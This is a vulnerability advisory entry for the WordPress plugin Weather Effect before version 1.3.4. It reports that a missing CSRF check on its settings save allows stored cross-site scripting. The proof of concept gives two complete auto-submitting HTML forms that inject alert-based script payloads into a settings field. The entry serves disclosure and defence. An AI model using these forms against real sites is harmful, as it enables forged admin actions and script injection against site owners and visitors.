Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting
Description
The plugin does not have any CSRF checks in place when saving its settings, and do not validate or escape them, which could lead to Stored Cross-Site Scripting issue. v1.3.4 fixed the CSRF, but not the sanitisation/escaping fully. Another issue has been created for it
Proof of Concept
To have the XSS only trigger in the frontend: <form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf"> <input type="hidden" name="enable_weather_effect" value="1"> <input type="hidden" name="weather_occasion" value="christmas_check"> <input type="hidden" name="christmas_types" value="snow_effect"> <input type="hidden" name="ball" value="ball"> <input type="hidden" name="christmas_ball" value="ball3"> <input type="hidden" name="bell" value="bell"> <input type="hidden" name="christmas_bell" value="bell3"> <input type="hidden" name="christmas_candy" value="candy3"> <input type="hidden" name="christmas_gift" value="gift3"> <input type="hidden" name="christmas_snowman" value="snowman3"> <input type="hidden" name="christmas_snow_flake" value="flack2"> <input type="hidden" name="christmas_min_size_leaf" value="alert(location)||30"> <input type="hidden" name="christmas_max_size_leaf" value="50"> <input type="hidden" name="christmas_flakes_leaf" value="5"> <input type="hidden" name="christmas_speed" value="5"> <input type="hidden" name="snow_action" value="save_setting"> </form> <script>csrf.submit()</script> XSS Trigger in the backend as well: <form action="https://example.com/wp-admin/admin.php?page=weather-effects-setting" method="post" id="csrf"> <input type="hidden" name="enable_weather_effect" value="1"> <input type="hidden" name="weather_occasion" value="christmas_check"> <input type="hidden" name="christmas_types" value="snow_effect"> <input type="hidden" name="ball" value="ball"> <input type="hidden" name="christmas_ball" value="ball3"> <input type="hidden" name="bell" value="bell"> <input type="hidden" name="christmas_bell" value="bell3"> <input type="hidden" name="christmas_candy" value="candy3"> <input type="hidden" name="christmas_gift" value="gift3"> <input type="hidden" name="christmas_snowman" value="snowman3"> <input type="hidden" name="christmas_snow_flake" value="flack2"> <input type="hidden" name="christmas_min_size_leaf" value='"><img src onerror=alert(/XSS/)>'> <input type="hidden" name="christmas_max_size_leaf" value="50"> <input type="hidden" name="christmas_flakes_leaf" value="5"> <input type="hidden" name="christmas_speed" value="5"> <input type="hidden" name="snow_action" value="save_setting"> </form> <script>csrf.submit()</script>
Affects Plugins
Fixed in version 1.3.4✓
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-09-07 (about 1 months ago)
Added
2021-09-07 (about 1 months ago)
Last Updated
2021-09-07 (about 1 months ago)